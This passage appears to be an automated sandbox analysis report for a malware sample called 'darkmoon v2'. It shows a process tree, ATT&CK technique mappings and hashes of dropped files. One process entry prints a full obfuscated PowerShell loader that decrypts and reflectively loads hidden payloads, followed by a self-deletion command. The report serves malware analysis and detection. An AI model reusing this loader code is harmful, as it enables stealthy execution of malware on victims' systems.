                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{1b04f597-d3c9-422f-bba8-c0898c677587}
                                                  5⤵
                                                    PID:5568
                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{037fd075-bcee-4c71-9777-f9a8b03b7f8c}
                                                    5⤵
                                                      PID:2816
                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{9fec524e-4bda-4a86-b061-7387f325b110}
                                                      5⤵
                                                        PID:5224
                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{60763951-d5bf-4ef7-b1e6-8f360d18267c}
                                                        5⤵
                                                          PID:5512
                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{8ea2c38b-1a76-413e-8d51-68a65c8bb06e}
                                                          5⤵
                                                            PID:3200
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                    1⤵
                                                    • Drops file in System32 directory
                                                    PID:1204
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1264
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                      1⤵
                                                        PID:1304
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                        1⤵
                                                          PID:1336
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                          1⤵
                                                            PID:1440
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                            1⤵
                                                              PID:1500
                                                              • C:\Windows\system32\sihost.exe
                                                                sihost.exe
                                                                2⤵
                                                                  PID:2564
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                1⤵
                                                                  PID:1564
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                  1⤵
                                                                    PID:1584
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                    1⤵
                                                                      PID:1680
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                      1⤵
                                                                        PID:1704
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                        1⤵
                                                                          PID:1752
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                          1⤵
                                                                            PID:1784
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1832
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                              1⤵
                                                                                PID:1900
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1912
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1976
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                    1⤵
                                                                                      PID:2004
                                                                                    • C:\Windows\System32\spoolsv.exe
                                                                                      C:\Windows\System32\spoolsv.exe
                                                                                      1⤵
                                                                                        PID:1388
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                        1⤵
                                                                                          PID:2108
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                          1⤵
                                                                                            PID:2200
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                            1⤵
                                                                                            • Checks processor information in registry
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2336
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2404
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                              1⤵
                                                                                                PID:2412
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                1⤵
                                                                                                  PID:2584
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2696
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                  1⤵
                                                                                                    PID:2800
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                    1⤵
                                                                                                      PID:2820
                                                                                                    • C:\Windows\sysmon.exe
                                                                                                      C:\Windows\sysmon.exe
                                                                                                      1⤵
                                                                                                        PID:2828
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                        1⤵
                                                                                                          PID:2836
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                          1⤵
                                                                                                            PID:2848
                                                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:3128
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                              1⤵
                                                                                                                PID:3380
                                                                                                              • C:\Windows\Explorer.EXE
                                                                                                                C:\Windows\Explorer.EXE
                                                                                                                1⤵
                                                                                                                • Suspicious use of UnmapMainImage
                                                                                                                PID:3508
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat"
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:752
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    3⤵
                                                                                                                      PID:372
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
                                                                                                                      "AyBYMBjlvU.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                      3⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3552
                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{093c689a-bad8-40e5-9cfe-cfc4c4c1ed69}
                                                                                                                        4⤵
                                                                                                                          PID:3952
                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{c2fe2600-ce48-40b2-8a5c-452fd878cdcb}
                                                                                                                          4⤵
                                                                                                                            PID:2192
                                                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{7338f1f1-edc9-4a56-b6f9-c083c9ace279}
                                                                                                                            4⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3232
                                                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{8417faf8-8349-4ad7-902a-9f34247f57da}
                                                                                                                            4⤵
                                                                                                                              PID:6020
                                                                                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{039bade7-b6fc-45d0-b8fb-e4d99cde101c}
                                                                                                                              4⤵
                                                                                                                                PID:6028
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe" & exit
                                                                                                                                4⤵
                                                                                                                                  PID:4952
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    5⤵
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:5748
                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                    PING localhost -n 8
                                                                                                                                    5⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:6076
                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                    taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:2240
                                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                                    ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Views/modifies file attributes
                                                                                                                                    PID:6140
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                            1⤵
                                                                                                                              PID:3644
                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                              1⤵
                                                                                                                                PID:3836
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:3996
                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:3368
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:64
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:4200
                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:3984
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                          1⤵
                                                                                                                                            PID:632
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                            1⤵
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:1200
                                                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:1616
                                                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                              1⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:4980
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                              1⤵
                                                                                                                                                PID:1100
                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                1⤵
                                                                                                                                                  PID:1164
                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4228
                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:3800
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3224
                                                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      PID:3216
                                                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4524
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3092
                                                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:2788
                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                          1⤵
                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                          PID:6068
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5464 -ip 5464
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                            PID:4024
                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 700 -p 1952 -ip 1952
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                            PID:5336
                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 580 -p 5788 -ip 5788
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                            PID:4728
                                                                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5724
                                                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                            1⤵
                                                                                                                                                              PID:768
                                                                                                                                                            • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1152
                                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2796

                                                                                                                                                                Network

                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                Defense Evasion

                                                                                                                                                                Hide Artifacts

                                                                                                                                                                1
                                                                                                                                                                T1564

                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                1
                                                                                                                                                                T1564.001

                                                                                                                                                                Discovery

                                                                                                                                                                Query Registry

                                                                                                                                                                5
                                                                                                                                                                T1012

                                                                                                                                                                System Information Discovery

                                                                                                                                                                5
                                                                                                                                                                T1082

                                                                                                                                                                Remote System Discovery

                                                                                                                                                                1
                                                                                                                                                                T1018

                                                                                                                                                                Replay Monitor

                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                Downloads

                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER1577.tmp.csv
                                                                                                                                                                  Filesize

                                                                                                                                                                  41KB

                                                                                                                                                                  MD5

                                                                                                                                                                  4ce57de51e6530f1a94ca95a28c8e7a1

                                                                                                                                                                  SHA1

                                                                                                                                                                  4ba9e13dd783966aca6f9ef77e2f35bc923d6d03

                                                                                                                                                                  SHA256

                                                                                                                                                                  0d0e2200237fa1717614a4961b1044de1e527442d4ba818aba68db4f2658d4ad

                                                                                                                                                                  SHA512

                                                                                                                                                                  5fe813bd73ac7da73b8aed205110199bd040827ba6f722f2d88a816241028b317a6939bd087ff16be05cb55663fd42fa7d1a056b6e938703269eb6132c85572a

                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER15D6.tmp.txt
                                                                                                                                                                  Filesize

                                                                                                                                                                  13KB

                                                                                                                                                                  MD5

                                                                                                                                                                  8b6e4f5179a1c8363cee64c03001db64

                                                                                                                                                                  SHA1

                                                                                                                                                                  e44cbf359fed299d0650865395384a07abe56544

                                                                                                                                                                  SHA256

                                                                                                                                                                  c654d39875ec39244625ed1dcfebc9d00eeaa313839b37db47a776def3170316

                                                                                                                                                                  SHA512

                                                                                                                                                                  16f8b80e23d69b90a8763e0f9d67571b41572d48aee20c3fd7d8796380ea1c4c439ba3c6242e545ef7570a6f7753ffb7b1ad35cfc76ea2083fa1743fce3ef6e8

                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER18A6.tmp.csv
                                                                                                                                                                  Filesize

                                                                                                                                                                  41KB

                                                                                                                                                                  MD5

                                                                                                                                                                  92baf36a00b29c93b4d39cf9ab6194b0

                                                                                                                                                                  SHA1

                                                                                                                                                                  502dd5e5b6ddb8d3157f07a30aa034c3037c03c1

                                                                                                                                                                  SHA256

                                                                                                                                                                  8be10b2013275d0be7e7ab66c264ea84762130389da271f7251313ade13310cd

                                                                                                                                                                  SHA512

                                                                                                                                                                  1f58d10c5dd839d033063d7792ba62e8769e3912b1a21af27828a28727b3caab3befa86f8322cc5c2670f77ec53baf27f641566a17bf4255597d11ce2490a321

                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER18C6.tmp.txt
                                                                                                                                                                  Filesize

                                                                                                                                                                  13KB

                                                                                                                                                                  MD5

                                                                                                                                                                  4875b42bb239adbb7730a31ff0ce60a1

                                                                                                                                                                  SHA1

                                                                                                                                                                  452b4b703105ad75af92a624319a09b5123ee80b

                                                                                                                                                                  SHA256

                                                                                                                                                                  dc815909957045d900e7459f3e2b18edf9b13f2ec9b71d927a767e4178baad94

                                                                                                                                                                  SHA512

                                                                                                                                                                  58efabc22936f4bf68c0861cd62d2df6429ea7ddd3ed239fe7a6d9127db62b62a5bc6d3b427793354014d53682693fb05e75621c5a2e077a1303ffd6bdd9ef6c

                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A7C.tmp.csv
                                                                                                                                                                  Filesize

                                                                                                                                                                  40KB

                                                                                                                                                                  MD5

                                                                                                                                                                  c0e4f2a77447c1fa91d578bc7bb6bded

                                                                                                                                                                  SHA1

                                                                                                                                                                  1414726e41a27648f32e5d3d6fb6aa6e2c21af49

                                                                                                                                                                  SHA256

                                                                                                                                                                  490b16e4e9a9af98cb0a7d9e7a814b4808966bb0a67acf9b59015f6f7f287f8c

                                                                                                                                                                  SHA512

                                                                                                                                                                  77f0fe290bc4ceebe4b5334be3587ea0c8cbef71fd1b6984025b522d25168ffea695d7ed5d16269312801473aca2ab2b7369cdd3a07d5da94a5465cff2fdce19

                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AAC.tmp.txt
                                                                                                                                                                  Filesize

                                                                                                                                                                  13KB

                                                                                                                                                                  MD5

                                                                                                                                                                  063179f287080cb4c0ff94128dffc262

                                                                                                                                                                  SHA1

                                                                                                                                                                  d70f5af5bf445e11759f6437ba244a67dcf2e466

                                                                                                                                                                  SHA256

                                                                                                                                                                  bc9b1167c6bfe6b7417df6d46663f23a0daf7a29796fbae85b6ea48c15562d10

                                                                                                                                                                  SHA512

                                                                                                                                                                  43df444bb42548065865663442f8ef8ac6da2e14260d0e0f14d68cbff2ecbb5738ce2a2a3495f97ceb51f1e60ea3db0f1547f665a2080d595c0b7bda853a0c70

                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rlyhfsoq.jkd.ps1
                                                                                                                                                                  Filesize

                                                                                                                                                                  60B

                                                                                                                                                                  MD5

                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                  SHA1

                                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                  SHA256

                                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                  SHA512

                                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
                                                                                                                                                                  Filesize

                                                                                                                                                                  442KB

                                                                                                                                                                  MD5

                                                                                                                                                                  04029e121a0cfa5991749937dd22a1d9

                                                                                                                                                                  SHA1

                                                                                                                                                                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                                                  SHA256

                                                                                                                                                                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                                                  SHA512

                                                                                                                                                                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                                                • C:\Windows\$sxr-cmd.exe
                                                                                                                                                                  Filesize

                                                                                                                                                                  283KB

                                                                                                                                                                  MD5

                                                                                                                                                                  8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                                                  SHA1

                                                                                                                                                                  f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                                                  SHA256

                                                                                                                                                                  b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                                                  SHA512

                                                                                                                                                                  99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                                                • C:\Windows\$sxr-mshta.exe
                                                                                                                                                                  Filesize

                                                                                                                                                                  14KB

                                                                                                                                                                  MD5

                                                                                                                                                                  0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                                                  SHA1

                                                                                                                                                                  51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                                                  SHA256

                                                                                                                                                                  dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                                                  SHA512

                                                                                                                                                                  d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                                  Filesize

                                                                                                                                                                  2KB

                                                                                                                                                                  MD5

                                                                                                                                                                  8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                  SHA1

                                                                                                                                                                  98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                  SHA256

                                                                                                                                                                  ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                  SHA512

                                                                                                                                                                  c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                                  Filesize

                                                                                                                                                                  2KB

                                                                                                                                                                  MD5

                                                                                                                                                                  f313c5b4f95605026428425586317353

                                                                                                                                                                  SHA1

                                                                                                                                                                  06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                  SHA256

                                                                                                                                                                  129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                  SHA512

                                                                                                                                                                  b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                                  Filesize

                                                                                                                                                                  2KB

                                                                                                                                                                  MD5

                                                                                                                                                                  ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                  SHA1

                                                                                                                                                                  a3879621f9493414d497ea6d70fbf17e283d5c08

